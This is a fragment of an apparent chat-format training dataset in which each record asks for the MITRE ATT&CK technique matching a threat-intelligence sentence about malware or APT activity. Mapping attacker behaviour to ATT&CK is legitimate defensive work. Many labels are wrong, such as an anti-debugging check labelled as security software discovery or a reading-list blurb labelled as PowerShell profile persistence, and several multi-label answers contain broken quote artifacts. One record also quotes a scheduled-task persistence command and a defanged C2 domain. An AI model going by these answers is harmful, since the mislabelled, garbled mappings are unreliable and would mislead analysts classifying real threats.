- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 used GetPassword_x64 to harvest credentials."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tomiris can download files and execute them on a victim's system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the \"Invoke-PSRemoting\" module."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hides collected data in password-protected .rar archives."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT32 backdoor can use HTTP over a non-standard TCP port (e.g 14146) which is specified in the backdoor configuration."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TIN WOODLAWNTIN WOODLAWN is a targeted threat group, active since at least 2014, that CTU researchers assess with moderate confidence is operated or tasked by the Vietnamese government. TIN WOODLAWN is technically capable and uses a range of techniques including template injection, obfuscated macros and steganography for malware delivery, memory-resident malware, use of native command line scripts for Cobalt Strike persistence, and non-standard command and control channels such as DNS and ICMP.ToolsTaegis™ XDR Adversary Software Coverage Tool"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used CVE-2016-7255 to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit's \"Invoke-TokenManipulation\" Exfiltration module can be used to manipulate tokens."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used VBS and JavaScript scripts to help perform tasks on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A string with the 5-character length and encoded with BASE64 is added to the beginning of the buffer encoded using the BASE64 algorithm"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro has named malicious browser extensions and update files to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanHaiShu uses mshta.exe to load its program and files."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT has used HTTP if DNS C2 communications were not functioning."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious processes are marked red (click image to enlarge): The following malicious files are dropped and run: C:\\ProgramData\\{2ED05C38-D464-4188-BC7F-F6915DE8D764}\\OFFLINE\\9A189DFE\\C7B7C186\\main.vbs dcac79d7dc4365c6d742a49244e81fd0 C:\\Users\\Public\\Libraries\\RecordedTV\\DnE.ps1 7fe0cb5edc11861bc4313a6b04aeedb2 C:\\Users\\Public\\Libraries\\RecordedTV\\DnS.ps1 3920c11797ed7d489ca2a40201c66dd4 “C:\\Windows\\System32\\schtasks.exe” /create /F /sc minute /mo 3 /tn “GoogleUpdateTasksMachineUI” /tr C:\\Users\\Public\\Libraries\\RecordedTV\\backup.vbs 7528c387f853d96420cf7e20f2ad1d32 Command and control server is located in the following domain: tecsupport[.]in A detailed analysis of the malware is provided in two posts by Palo Alto networks and in a post by FireEye, which wrote about previous campaigns by this threat agent"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once run, the wiper will damage the Master Boot Record (MBR) of the infected computer, rendering it inoperable"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has created a directory named \"out\" in the user's %AppData% folder and copied files to it."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This RAT is also known for its keylogging and file transfer functionality. As such, any remote attacker can load any files onto the infected machine or even steal documents"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel has been distributed as a malicious attachment within a spearphishing email."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman has been delivered via spearphishing emails that contain a malicious zip file."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BlackEnergy component KillDisk is capable of deleting Windows Event Logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can collect the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main function of the Trojan interacts with its configured C2 server to obtain additional code to execute"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM primarily relies on compromised domain credentials to move through the target network, and as outlined above, uses several credential harvesting tools. Once they have acquired credentials, the activity group uses PsExec extensively to move laterally between hosts in the target network"
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT used TLS to encrypt command and control (C2) communications."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has been disguised as a legitimate executable, including as Windows SDK."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It maintains both code and data in the raw, encrypted blobs of data to be decrypted and used at runtime, and hidden functionality that isn’t exposed until runtime"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used malware to enumerate active processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has left taunting images and messages on the victims' desktops as proof of system access."
- },
- {
- "role": "assistant",
- "content": "T1491.001 - Defacement: Internal Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs most of its operations using Windows Script Host (Jscript and VBScript) and runs arbitrary shellcode ."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates with its C2 server over TCP port 3728."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk can enumerate all services running on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes collects the victim's %TEMP% directory path and version of Internet Explorer."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, in the previous variant of BADNEWS, the victim’s unique identifier was stored under a variable named ‘uid’, the username was stored in a variable named ‘u’, etc"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can check for the presence of specific security products."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to enumerate loaded modules for a process.."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used valid VPN credentials to gain initial access."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additional Reading This PowerShell logging blog post contains more information on improving PowerShell visibility in your environment"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperStack can add the name of its communication pipe to \"HKLM\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\lanmanserver\\\\parameters\\NullSessionPipes\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit', 'T1542.001 - Pre-OS Boot: System Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen"
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1098 - Account Manipulation', 'T1136.001 - Create Account: Local Account', 'T1564.002 - Hide Artifacts: Hidden Users"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has a function to kill processes associated with defenses and can prevent certain processes from launching."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As my analysis in the previous blog showed, Agent Tesla is a spyware. It monitors and collects the victim’s keyboard inputs, system clipboard, screen shots of the victim’s screen, as well as collects credentials of a variety of installed software. So far, through my quick analysis, this version is similar to the older one"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to create a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Cobalt Strike provides the ability to use the Artifact Kit framework for these purposes and even modify it, as it is distributed in the source code. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has dropped and executed tools used for password cracking, including Hydra and CrackMapExec."
- },
- {
- "role": "assistant",
- "content": "T1110.002 - Brute Force: Password Cracking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files.The VBScript-based file recon module used by the attackers is somewhat different. The URL constructed had the following format:http://<attacker_controlled_domain/>report.php"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has used native WINAPI calls."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following diagram illustrates the changes applied to targeted executables after infection has taken place and how these components interact on execution"
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can turn itself on or off at random intervals."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the initial computer on the targeted organization’s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials"
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool', 'T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DOGCALL can download and execute additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a Windows service to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has used the Farse6.1 utility (based on Mimikatz) to extract credentials from lsass.exe."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flash object in the .docx file, stored in uncompressed format The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist has the ability to collect the domain name on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has stored captured credential information in a file named pi.log."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to identify the MAC address on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper has used the name `postgressql.exe` to mask a malicious payload."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This IP is of particular interest as historical domain resolutions of this IP revealed that it had resolved to the domain hotmai1l[.]com in the past as well, which was a domain we had previously identified as having a high likelihood of association with DarkHydrus infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSOURCE is a PowerShell backdoor."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used malware to identify the computer name of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts command and control communications with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer has commands to delete files and persistence mechanisms from the victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used a Twitter account to communicate with ransomware victims."
- },
- {
- "role": "assistant",
- "content": "T1585.001 - Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
